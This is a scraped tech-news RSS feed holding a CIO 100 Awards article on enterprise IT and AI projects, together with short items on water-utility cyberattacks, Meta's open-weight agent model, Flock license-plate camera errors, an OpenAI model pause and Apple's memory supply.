<p class="wp-block-paragraph">Executives at Dow consider the Carbon Footprint Ledger (CFL) as more than a technology or innovative carbon accounting methodology. According to Senior Global IT Director <a href="https://www.linkedin.com/in/jeremypreston25/">Jeremy Preston</a>, CFL is “a digital business capability that enables Dow to translate sustainability investments into customer value.”</p>



<p class="wp-block-paragraph">CFL transformed how Dow uses greenhouse gas emissions data. It combines a methodology aligned to international standards with an enterprise-scale digital platform. It also integrates manufacturing, supply chain, commercial, and sustainability data to generate product carbon footprints under enterprise-level governance and management at scale.</p>



<p class="wp-block-paragraph">In doing so, Preston says it creates “a trusted, traceable link between low-carbon processes and raw materials implemented across its manufacturing network and the lower-carbon products customers seek.”</p>



<p class="wp-block-paragraph">The technology team worked closely with sustainability and business teams, collaboratively developing the capabilities needed to reconstruct product genealogy, maintain end-to-end data lineage, track low-carbon attributes across interconnected manufacturing processes, and generate product carbon footprints that can support customer offerings and commercial transactions.</p>



<p class="wp-block-paragraph">CFL was built on Dow’s Integrated Data Hub and in partnership with Boston Consulting Group and Databricks.</p>



<p class="wp-block-paragraph">The core CFL platform is fully deployed and supports commercial transactions today.</p>



<p class="wp-block-paragraph">Preston says CFL “enables Dow to turn sustainability investments into customer value, commercial differentiation, and new growth opportunities.” Dow reports that it has driven hundreds of millions of dollars in low-carbon product sales in 2025 and 2026.</p>



<p class="wp-block-paragraph">The company is now expanding its use. “We are extending adoption across additional products, manufacturing networks, business segments, and customer use cases while continuing to enhance automation, analytics, and integration with commercial processes,” Preston says.</p>



<h2 class="wp-block-heading">J&amp;J transforms quality management with AI</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Johnson &amp; Johnson</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Q&amp;C Strategy</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/mikecomprelli/">Michael Comprelli</a>, Vice President, Head of Technology, Technical Operations, and Risk; <a href="https://www.linkedin.com/in/inradius/">Joel O’Connor</a>, Head of Technology, Medtech Quality, and Compliance</p>



<p class="wp-block-paragraph">Johnson &amp; Johnson is using AI to transform quality management through its Q&amp;C Strategy.</p>



<p class="wp-block-paragraph">QuIn is an AI-powered digital assistant that fuses human expertise with machine learning, automation, and data-driven insights to boost efficiency, reliability, and worker impact. By embedding gen AI into core quality management systems processes, QuIn proactively gathers actionable insights, increases operational efficiency, and allows teams to focus on high-value, patient-centric work.</p>



<p class="wp-block-paragraph">Cora is an innovative generative AI platform that provides regulatory intelligence monitoring, impact analysis, and augmented content revision. Cora assists with document analysis, compliance comparison, stakeholder analysis, policy/standard creation, procedural/document updates, and document comparison. Cora is purpose-built for regulated environments, validating outputs against source material and offering a user experience that instills trust in the outcome.</p>



<p class="wp-block-paragraph">QuIn and Cora, which automate time-intensive tasks and democratize information access, are on track to deliver significant value, with J&amp;J reporting more than $62 million in documented true cost savings by 2028 from QuIn alone. Cora delivered $2 million in cost efficiency in 2025 and will deliver a documented cost savings of $25 million by 2028.</p>



<p class="wp-block-paragraph">“Our teams proved responsible AI can be applied meaningfully in a highly regulated environment without compromising the rigor, accountability, or human judgment that quality requires,” says Michael Comprelli, vice president, head of technology, technical operations, and risk.</p>



<p class="wp-block-paragraph">He continues, saying that J&amp;J “moved these ideas beyond experimentation and into products that employees use in their daily work. We did that by bringing together Quality expertise, product management, data engineering, architecture, cybersecurity, user-experience design and AI engineering around a common purpose.”</p>



<h2 class="wp-block-heading">JLL brings intelligent automation to business services</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> JLL</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Business Service Digitization</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/pinak-dash/">Pinak Dash</a>, Global Head of JLL Business Services and Legal Technologies</p>



<p class="wp-block-paragraph">JLL launched its digitization initiative to drive process redesign as well as systematic AI and RPA deployment across JLL Business Services (JBS).</p>



<p class="wp-block-paragraph">The initiative was designed to address inefficiencies that hampered scalability and competitive positioning. It was also designed to eliminate manual processes that consumed thousands of hours across finance, HR, legal, procurement, marketing, research, IT, and lease administration.</p>



<p class="wp-block-paragraph">Pinak Dash, global head of JBS and legal technologies, says the digitization initiative had a dual-strategy combining traditional digitization with generative AI innovation to hundreds of processes.</p>



<p class="wp-block-paragraph">JLL lists three innovations critical to the program’s success.</p>



<p class="wp-block-paragraph">First is a hybrid platform that integrates RPA with JLL’s proprietary AI platform called Falcon, which created intelligent automation that adapts and learns. It enables real-time process automation, intelligent document processing with automated extraction/validation, and smart decision-making for continuously optimizing workflows.</p>



<p class="wp-block-paragraph">The second innovation is its use of ProHance for real-time process monitoring and enabling of data-driven optimization. Sensors capture granular productivity metrics, identify bottlenecks, and provide actionable insights for continuous improvement across automated and manual processes.</p>



<p class="wp-block-paragraph">Third is its custom AI assistants and transaction agents. Falcon-powered assistants provide intelligent knowledge search while specialized agents execute complex transactions across enterprise SaaS platforms. These handle multisystem workflows, reducing human touchpoints while maintaining accuracy and compliance.</p>



<p class="wp-block-paragraph">Dash says the initiative has delivered quantifiable benefits through improved efficiency, accuracy, and quality of services provided to clients.</p>



<p class="wp-block-paragraph">“The initiative delivers on our business goals, makes us more efficient, provides customers better service, and it opens up the capabilities and bandwidth of our people to do what they like to do and to find innovative ways to serve our business,” he adds.</p>



<h2 class="wp-block-heading">Nationwide partnership platform delivers efficiencies, business growth</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Nationwide</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Enterprise Digital Platform (EDP)</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/michael-carrel-701839/">Michael Carrel</a>, EVP and CTO</p>



<p class="wp-block-paragraph">Nationwide’s new Enterprise Digital Platform (EDP) gives the company “a scalable way to connect with external partners quickly, securely, and consistently across all areas of our business,” says company EVP and CTO Michael Carrel.</p>



<p class="wp-block-paragraph">He explains that “instead of treating every integration as a custom effort, EDP creates a common front door for digital products, documentation, onboarding and governance.”</p>



<p class="wp-block-paragraph">That innovation has produced better experiences for the company’s partners. It saves time for Nationwide teams, partners, and customers. And it supports faster launch times for new products and enables growth across the business.</p>



<p class="wp-block-paragraph">“EDP changed the model from fragmented, point-to-point integrations into an enterprise platform built around reusable digital products. That shift lets us support a range of integration options in one governed environment, meet partners at different stages of technical maturity, and add new capabilities over time without redesigning every relationship from scratch,” Carrel explains.</p>



<p class="wp-block-paragraph">EDP uses cloud-native microservices, role-based access control, and advanced analytics. Nationwide IT created modular microservices to make EDP more scalable, resilient, and adaptable. And IT decoupled it from infrastructure-specific dependencies so that it would be a platform-agnostic developer portal. That, Carrel says, reduced operational constraints across environments.</p>



<p class="wp-block-paragraph">Additionally, IT shifted from a user-specific model to role-based access, which improved security, simplified administration, and better served the needs of different audiences.</p>



<p class="wp-block-paragraph">Meanwhile, robust analytics delivers visibility into platform usage and performance, which Carrel says helps ensure Nationwide continuously evolves the platform based on measurable outcomes.</p>



<p class="wp-block-paragraph">The core platform is fully deployed, with Nationwide planning to expand it.</p>



<p class="wp-block-paragraph">“Our Enterprise Digital Platform is more than a piece of technology,” Carrel notes, “it represents a strategic enabler to support growth objectives across Nationwide’s businesses.”</p>



<h2 class="wp-block-heading">PITT Ohio fast-tracks shipment requests with AI assist</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> PITT Ohio</p>



<p class="wp-block-paragraph"><strong>Project:</strong> No Touch Email (N@TE AI)</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/scott-sullivan-b359891/">Scott Sullivan</a>, President and CEO (formerly CIO)</p>



<p class="wp-block-paragraph">As PITT Ohio started its AI journey in 2024, the mandate was clear: Use the technology to solve “real problems,” says Ryan Carner, director of enterprise IT solutions.</p>



<p class="wp-block-paragraph">“We wanted to hit the ground running and find a problem that was solvable,” Carner says, noting that the company also wanted to use the experience to build in-house AI skills. “The idea was to find a business case for AI that would be our first but not the only one.”</p>



<p class="wp-block-paragraph">PITT Ohio leaders decided to tackle what Carner describes as a “mundane but very important task for how our business operates”: handling emails to the customer service team.</p>



<p class="wp-block-paragraph">The need was significant. Customer service representatives were manually processing hundreds of pickup request emails daily, each requiring five to 15 minutes to interpret and re-enter shipment details into the company’s transportation management system (TMS). The emails were complicated, containing a lot of information submitted in nonstandardized ways and varying formats. This repetitive task consumed valuable time, introduced errors, and delayed customer response.</p>



<p class="wp-block-paragraph">N@TE uses generative AI and natural language processing to transform unstructured email content into structured pickup orders automatically and in real-time. N@TE scans incoming emails, extracts key shipment data, and creates orders directly in the TMS via API integration. It operates seamlessly within existing workflows, requiring no change in customer behavior or retraining of staff.</p>



<p class="wp-block-paragraph">PITT Ohio deployed N@TE in 2025, and the company also secured a patent for the product that year. N@TE has produced a 30-60X increase in processing speed, 99% accuracy in extracting and populating order data, and a 70% reduction in handling costs per pickup order.</p>



<h2 class="wp-block-heading">SMU builds AI adoption through grassroots ambassador program</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Southern Methodist University</p>



<p class="wp-block-paragraph"><strong>Project:</strong> Scaling AI Without Scaling AI: Organizational AI Scaling Through Willingness</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/jasontwarner/">Jason Warner</a>, Associate CIO</p>



<p class="wp-block-paragraph">Like executives in most organizations, leaders at Southern Methodist University encountered mixed attitudes about AI. Some workers had little interest in using the tech, others were afraid it would take jobs, still others were curious about what it could do.</p>



<p class="wp-block-paragraph">Associate CIO Jason Warner and other leaders decided to leverage that last group, believing the best way to get SMU faculty and staff to embrace AI was to use enthusiasts to help smooth the way.</p>



<p class="wp-block-paragraph">So, instead of treating AI as a conventional technology rollout, Warner and his colleagues built opt-in communities of practice known as the AI Coalition of the Willing and Operation Copilot.</p>



<p class="wp-block-paragraph">The goal, Warner says, was to build institutional capability, reduce risk, and generate momentum.</p>



<p class="wp-block-paragraph">“We knew the fastest way to scale AI was to scale the willingness of people to use the technology, and not talking to people about cost savings and the like,” Warner says, adding that willing users as great ambassadors and evangelists who showcase in formal and informal ways the technology’s potential for hesitant or skeptical colleagues.</p>



<p class="wp-block-paragraph">Participating faculty members have access to a licensed ChatGPT account as long as they use it. Staff members have access to Copilot accounts after taking a self-paced training course and likewise must use it to keep that access.</p>



<p class="wp-block-paragraph">Warner says these willing workers are demonstrating the benefits of AI (significant time reclamation, reduced cognitive load, improved quality of outputs, expanded professional capacity).</p>



<p class="wp-block-paragraph">SMU is now moving to a single solution and scaling AI, confident that its use will deliver returns following in the footsteps of the early adopters.</p>



<p class="wp-block-paragraph"><strong><em><strong>Interested in meeting and learning from all CIO 100 winners? Join us next week at CIO 100 Awards &amp; Conference in Frisco, TX. Limited seats remain! </strong><a href="https://register.foundryco.com/mq3MaX?rt=5FJf1djA6UC8VitjiXqAMg&amp;utm_source=Editorial&amp;utm_campaign=CIOArticle&amp;utm_medium=CIOArticle&amp;RefId=CIOArticle"><strong>Register here</strong></a><strong> </strong></em></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Jersey, Alabama Join States Targeted in Water Cyberattacks]]></title>
<description><![CDATA[Hackers linked to Iran targeted industrial control systems (ICS) at water facilities in at least a dozen US states.
The post New Jersey, Alabama Join States Targeted in Water Cyberattacks appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3713403/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713403/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:33 +0200</pubDate>
<content:encoded><![CDATA[<p>Hackers linked to Iran targeted industrial control systems (ICS) at water facilities in at least a dozen US states.</p>
<p>The post <a href="https://www.securityweek.com/new-jersey-alabama-join-states-targeted-in-water-cyberattacks/">New Jersey, Alabama Join States Targeted in Water Cyberattacks</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta's 'Open' Muse Glimmer Model Can Run On a Single Computer]]></title>
<description><![CDATA[Meta has released Muse Glimmer, a slimmed-down open-weight AI model designed to run locally on a single GPU for agent tasks such as scheduling, file management, coding, and tool use. The release is based on Meta's closed Muse Spark 1.2 model and appears to be aimed at attracting developers who wa...]]></description>
<link>https://tsecurity.de/de/3713386/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713386/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:29 +0200</pubDate>
<content:encoded><![CDATA[Meta has released Muse Glimmer, a slimmed-down open-weight AI model designed to run locally on a single GPU for agent tasks such as scheduling, file management, coding, and tool use. The release is based on Meta's closed Muse Spark 1.2 model and appears to be aimed at attracting developers who want capable AI agents without relying entirely on cloud-hosted services. Engadget reports: Facebook said that it's making the "weights" that AI systems use to choose responses available to everyone on Hugging Face along with developer documentation. The download is available for free, and users can run the model on their own PCs. The company noted that optimized integrations will land on llama.cpp and other sites, "so you can go from download to working agent in minutes."
 
The model is powerful for its size, according to Meta, with the "strong success rates" on benchmarks like DeepSearch QA, MCP-Atlas and SWE-Bench (which evaluates its ability write and debug code). It also supports reliable tool use, multi-step reasoning, failure recovery, multimodal input and scaffold compatibility for work with OpenClaw and other agent orchestrators. It was trained on data from over 100 languages, the company added. "Rather than centralizing superintelligence, we should distribute it widely and give every person the ability to direct it," CEO Mark Zuckerberg said in an essay accompanying Muse Glimmer's release. "This has the potential to begin a new era of personal empowerment where individuals can use this powerful new capability to reach their full potential, pursue their interests, and improve their lives and the world more than ever before."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Meta's+'Open'+Muse+Glimmer+Model+Can+Run+On+a+Single+Computer%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F08%2F10%2F163237%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F08%2F10%2F163237%2Fmetas-open-muse-glimmer-model-can-run-on-a-single-computer%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/08/10/163237/metas-open-muse-glimmer-model-can-run-on-a-single-computer?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Accurate Are Flock's AI-Powered License-Reading Cameras?]]></title>
<description><![CDATA[Futurism reports:

 404 Media revealed that a July 10 audit by the Los Angeles Police Department Office of the Inspector General caught the department's ALPR cameras generating 161 false stolen-vehicle alerts in just two months — each one ending with officers pulling over an innocent driver. Fact...]]></description>
<link>https://tsecurity.de/de/3713391/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713391/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:29 +0200</pubDate>
<content:encoded><![CDATA[Futurism reports:

 404 Media revealed that a July 10 audit by the Los Angeles Police Department Office of the Inspector General caught the department's ALPR cameras generating 161 false stolen-vehicle alerts in just two months — each one ending with officers pulling over an innocent driver. Factoring in 337 alerts which "resulted in the recovery of stolen vehicles," the LAPD's cameras carry an error rate of 32.3 percent, effectively giving officers a one-in-three chance at pulling an innocent person over.
 

"The biggest issue remains this national database at the FBI called NCIC," Flock's CEO Garrett Langley recently told The Drive, complaining about "how archaic its structure is."


Flock CEO: There's no feedback loop mechanisms; it's really just a static comma-separated file. 

We've tried to build around it. We have this concept called "suppression." A local agency — let's take Atlanta, where I live — might see that there's a stolen plate out of California, but it's already been resolved because it's a rental car or a dealer car. They can, in Flock, suppress that: "Never alert us on that for the next year." That's to get around the fact that they can't force another agency to remove it from NCIC.
Ideally, the way it would work is if enough agencies — let's call it one, two, or three — flag a tag as no longer valid or a bad entry, it should just get removed. Or at least it should get pushed more aggressively by the FBI... I'm hopeful that they'll see there's an opportunity to make something like NCIC, which is an important tool not just for companies like Flock, but for police departments to work together, start to make some enhancements to modernize what's a central part of our policing system. 

Later in the interview he says "It's less than one in a million alerts that an officer says, 'I'm not sure if that's right.' Less than one in a million." 

 A recent report from Business Insider shares a worst-case scenario. In the summer of 2024 a Sacramento police officer said Flock's cameras had sent six false alerts for the same vehicle, wrongly saying it had been stolen or used in a felony crime in the nearby suburb of Roseville:


Roseville police could see that Flock's software kept confusing the "9" on the man's license plate for an "8." The car owner said he would take off his license plate cover. Soon after, it happened again. It's "easier at this point we have it memorized," a dispatch supervisor in Roseville wrote in an email to a colleague. 

Flock says that in optimal conditions, its cameras accurately read more than 96% of license plate characters. Hundreds of pages of records from the Roseville Police Department show a different picture. In 2023 and 2024, Flock sent 1,427 alerts to Roseville police, flagging vehicles as stolen or used in a felony after they passed one of the city's Flock cameras. An analysis by the police department found that in 71% of those alerts, Flock's machine-learning software incorrectly read the license plates... The cameras regularly missed vehicles, captured blurry images, misread license plate characters and states, and sent delayed alerts to police about vehicles possibly connected to crimes, the records show... 

A factor that contributed to the misread problems in Roseville was the "particularly unique deployment" that the city requested, a Flock spokeswoman said. Roseville said it has its cameras configured so that they capture only the backs of vehicles, a setup intended to avoid capturing personally identifiable information like faces. Roseville's setup included older hardware and placement of cameras higher and further from vehicles than the company typically recommends, Flock added... 

 In Toledo, Ohio, driver Brandon Upchurch was mauled by a police dog after a Flock camera misread the "7" on his license plate as a "2." As a result of his injuries, he said, he lost his job and was evicted from his home. He settled a lawsuit against the city and police officer for $35,000. None of the incorrect Flock alerts in Roseville resulted in a traffic stop or arrest, a department spokesman said. Roseville requires police officers to verify that a license plate is stolen or have independent reasonable suspicion of a crime before making a traffic stop... 

Flock said Roseville's camera performance has significantly improved, which the police department disputed... Flock's cameras also missed vehicles altogether... At one point, Flock's product director for machine learning suggested that officers ask drivers to remove license plate frames that made it "very difficult for the machine vision to tell it is actually a 'E' and not an 'F.'" Roseville told Flock at the time that it wouldn't do so, according to the department spokesman. Flock in 2024 shared an analysis with Roseville's police department, outlining reasons for the misreads. Vehicles far from a camera were sometimes blurry. Plates were cut off by trees or license plate frames. And Flock's software confused similar characters, mistaking an "N" for a "V", or a "1" for a "4...." 
Roseville isn't the first organization to flag inaccuracies in Flock's technology. In 2021, the research firm IPVM independently tested Flock's license plate readers, concluding that Flock misidentified the state in about one of 10 reads, and that the system regularly misclassified vehicles' type and make. IPVM said that Flock subsequently blocked it from purchasing its cameras for testing. 

Thanks to long-time Slashdot reader Cognitive Dissident for sharing the article.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=How+Accurate+Are+Flock's+AI-Powered+License-Reading+Cameras%3F%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F08%2F09%2F230247%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F08%2F09%2F230247%2Fhow-accurate-are-flocks-ai-powered-license-reading-cameras%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/08/09/230247/how-accurate-are-flocks-ai-powered-license-reading-cameras?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's Next AI Model Astra Shows Cyber Performance Strong Enough to Trigger Pause]]></title>
<description><![CDATA[OpenAI has announced that it's pausing some "internal activities" involving its upcoming artificial intelligence (AI) model Astra after an internal evaluation found it had made significant advancements in agentic coding and cybersecurity.

In response to the discovery, the AI upstart said it's im...]]></description>
<link>https://tsecurity.de/de/3713379/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713379/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:26 +0200</pubDate>
<content:encoded><![CDATA[OpenAI has announced that it's pausing some "internal activities" involving its upcoming artificial intelligence (AI) model Astra after an internal evaluation found it had made significant advancements in agentic coding and cybersecurity.

In response to the discovery, the AI upstart said it's implementing security controls for higher-capability models and associated activities, such as isolated]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s real memory problem isn’t cost, it’s supply]]></title>
<description><![CDATA[Apple continues work to get White House go-ahead to source memory from Chinese supplier CXMT, which the US government has placed restrictions on.



For Apple, the issue comes down to simple math. With the cost of making iPhones up 38% because of eye-watering memory price increases — up almost 7-...]]></description>
<link>https://tsecurity.de/de/3713323/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713323/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:09 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Apple <a href="https://www.wsj.com/tech/apple-tests-chinese-memory-chips-as-supply-squeeze-bites-d292bb97" target="_blank" rel="noreferrer noopener">continues work</a> to get White House go-ahead to source memory from Chinese supplier CXMT, which the US government has placed restrictions on.</p>



<p class="wp-block-paragraph">For Apple, the issue comes down to simple math. With the <a href="https://www.applemust.com/trendforce-says-iphone-18-pro-costs-apple-38-more-to-make/#google_vignette" target="_blank" rel="noreferrer noopener">cost of making iPhones up 38%</a> because of eye-watering memory price increases — up almost 7-fold since the beginning of 2025 — it makes sense to make pragmatic choices when it comes to sourcing supply, particularly when other computer companies (including HP and Acer) already obtain memory from CXMT.</p>



<p class="wp-block-paragraph">US resistance to the plan is that because of the way Apple packages memory on chip, the use of that memory might partly contravene the technology transfer restrictions the US has in place. Note: use of off-the-shelf components is fine.</p>



<p class="wp-block-paragraph">Apple has been lobbying to use memory from the supplier only on devices made and sold in China and would likely argue this is reasonable given that both HP and Acer already use CXMT memory in products sold outside the US. </p>



<h2 class="wp-block-heading"><strong>Why it’s really about supply</strong></h2>



<p class="wp-block-paragraph">The iPhone maker’s dilemma isn’t just about memory price, it’s also about ensuring it has enough component supply to <a href="https://www.computerworld.com/article/4205686/apples-memory-crisis-is-a-big-red-flag-for-tech.html">satisfy demand for its products</a>. This is plausibly a bigger challenge for the company, which is already warning of constrained supply because of lack of available memory. Samsung, Micron, and SK Hynix have <a href="https://www.digitimes.com/news/a20260804PD217/2027-capacity-dram-nand-2026.html" target="_blank" rel="noreferrer noopener">allegedly already sold through all their DRAM production for 2027</a>, which only sharpens Apple’s case to secure alternate sources.</p>



<p class="wp-block-paragraph">With that in mind, it matters that China consumes around 20% of all Apple hardware sold globally. All the company needs is the go-ahead to use RAM from CXMT in those Chinese-made, China-sold devices.</p>



<p class="wp-block-paragraph">That alone would effectively grow its usable memory supply by the same amount, because the non-restricted memory it currently has to use in Chinese-market products could be freed up for devices sold elsewhere, with CXMT covering the China-sold units instead.</p>



<p class="wp-block-paragraph">With demand for its products accelerating —even amid a broad industry downturn — Apple really wants to make sure it has enough of the component to meet demand. Those powerful, on-premises 1.5TB RAM-equipped M7 Ultra Mac Studio AI clusters won’t exist unless it’s possible to find memory to put inside them.</p>



<h2 class="wp-block-heading"><strong>The timeline challenge</strong></h2>



<p class="wp-block-paragraph">The <a href="https://thecorenews.substack.com/p/the-core-apple-tldr-august-6?r=5l3lg&amp;utm_campaign=post-expanded-share&amp;utm_medium=web" target="_blank" rel="noreferrer noopener">proposed arrangement with CXMT</a> might not be a quick fix. Recent reporting indicated the company has already reached its production capacity for 2026, though it is working to double capacity by 2028. Apple has already tested memory chips from the company across products including iPhones and MacBooks.</p>



<p class="wp-block-paragraph">While Apple this year has applied steep price increases across all its products (except for iPhones), it is now <a href="https://www.applemust.com/apple-may-increase-iphone-17-prices-august-10/" target="_blank" rel="noreferrer noopener">expected to increase the cost</a> of the current iPhone 17 models perhaps as soon as this week. </p>



<p class="wp-block-paragraph">Market reports already warn that Apple will raise prices on its <a href="https://www.forbes.com/sites/davidphelan/2026/07/22/iphone-18-pro-release-date-apples-15-year-event-timeline-points-to-one-september-date/" target="_blank" rel="noreferrer noopener">soon-to-debut iPhone 18 Pro and iPhone Ultra</a> devices next month, and we expect availability to be constrained, once again as a result of RAM shortages. Even if Apple gets the go-ahead to work with CXMT to close the gap, the positive impact of that arrangement is unlikely to kick in before next year.</p>



<h2 class="wp-block-heading"><strong>Enjoy the pain</strong></h2>



<p class="wp-block-paragraph">Elsewhere, big memory manufacturers, <a href="https://www.gsmarena.com/sk_hynix_promises_to_invest_over_38_billion_in_new_dram_and_nand_fabs-news-74075.php" target="_blank" rel="noreferrer noopener">including SK Hynix</a>, have announced plans to invest in new DRAM manufacturing capacity. But this will not be operational until 2029, at the earliest.</p>



<p class="wp-block-paragraph">This suggests constrained product availability and higher prices for the coming months — and the only way Apple, or anyone else, will be able to limit the impact of those price increases across the entire electronics industry will be if they can obtain additional stocks of memory from vendors outside the big three. If they cannot, you can kiss the age of abundance goodbye.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIO 100 Award winners spotlight IT’s power to transform]]></title>
<description><![CDATA[Each year the CIO 100 Awards showcase outstanding IT initiatives, and every year they illustrate the power and potential of technology to transform how people work, how organizations perform, and the value they offer to customers.



The 2026 cohort of winners is no different. Each one demonstrat...]]></description>
<link>https://tsecurity.de/de/3713318/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713318/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:51:08 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Each year the <a href="https://event.foundryco.com/cio100-symposium-and-awards/awards/">CIO 100 Awards</a> showcase outstanding IT initiatives, and every year they illustrate the power and potential of technology to transform how people work, how organizations perform, and the value they offer to customers.</p>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/220017/us-cio-100-winners-celebrating-it-innovation-and-leadership.html">2026 cohort of winners</a> is no different. Each one demonstrates how IT executives and their teams successfully move from ideation to deployment to scaling a solution for the future, overcoming challenges and driving adoption along the way to ensure their organization gets a return on its investment.</p>



<p class="wp-block-paragraph"><strong>[ Interested in meeting and learning from all CIO 100 winners? Join us next week at CIO 100 Awards &amp; Conference in Frisco, TX. Limited seats remain! </strong><a href="https://register.foundryco.com/mq3MaX?rt=5FJf1djA6UC8VitjiXqAMg&amp;utm_source=Editorial&amp;utm_campaign=CIOArticle&amp;utm_medium=CIOArticle&amp;RefId=CIOArticle"><strong>Register here</strong></a><strong> ]</strong></p>



<p class="wp-block-paragraph">The winning initiatives come from a range of industries and utilize a host of technologies to achieve their goals, as is the case annually. A growing proportion of these stand-out projects leverage artificial intelligence, raising the bar on the art of the possible for all IT departments.</p>



<p class="wp-block-paragraph">The following 10 award-winning projects serve as representatives for the outstanding work done by all the 2026 honorees.</p>



<h2 class="wp-block-heading">ABB democratizes AI agent creation and deployment</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> ABB</p>



<p class="wp-block-paragraph"><strong>Project:</strong> ABBY — AI Agentic Platform for Workforce Transformation</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/vikke-kandell/">Vikke Kandell</a>, CIO</p>



<p class="wp-block-paragraph">IT leaders at ABB, a manufacturer, had some big hurdles to clear when it came to building an AI strategy.</p>



<p class="wp-block-paragraph">They had to overcome employee fears that AI would take away jobs, the potentially high cost of AI vendor licenses, and pressure from investors, customers, and executives to advance the use of AI in the enterprise.</p>



<p class="wp-block-paragraph">“We looked at this and asked, ‘How do we address all this?’ and build something that the company is proud of,” says Babu Kuttala, vice president of data analytics and AI.</p>



<p class="wp-block-paragraph">The answer is ABBY, an AI agentic platform that enables employees to create and deploy specialized AI agents for specific business tasks.</p>



<p class="wp-block-paragraph">To build ABBY, Kuttala and his team used best-of-breed LLMs (about 25 in total). They built a centralized orchestration layer using generative AI that integrates internal knowledge bases with external ecosystems, creating a unified platform where agents can access enterprise data, understand required actions, and execute tasks across multiple systems. And they created preconfigured skills so that employees could build agents tailored to their workflows without having to code.</p>



<p class="wp-block-paragraph">ABBY was rolled out in 2025 to 100 users but is now used by 63,000 (more than 75% of the company’s workforce, Kuttala notes) with an average of 10,000-plus workers using it daily. IT continues to add LLMs and capabilities to expand use of ABBY even further, Kuttala says.</p>



<h2 class="wp-block-heading">Belcorp modernizes manufacturing with Smart Factory</h2>



<p class="wp-block-paragraph"><strong>Organization:</strong> Belcorp</p>



<p class="wp-block-paragraph"><strong>Project:</strong> QPlant — Smart Factory</p>



<p class="wp-block-paragraph"><strong>IT leader:</strong> <a href="https://www.linkedin.com/in/venkatgopalan/">Venkat Gopalan</a>, Chief Digital, Data, and Technology Officer</p>



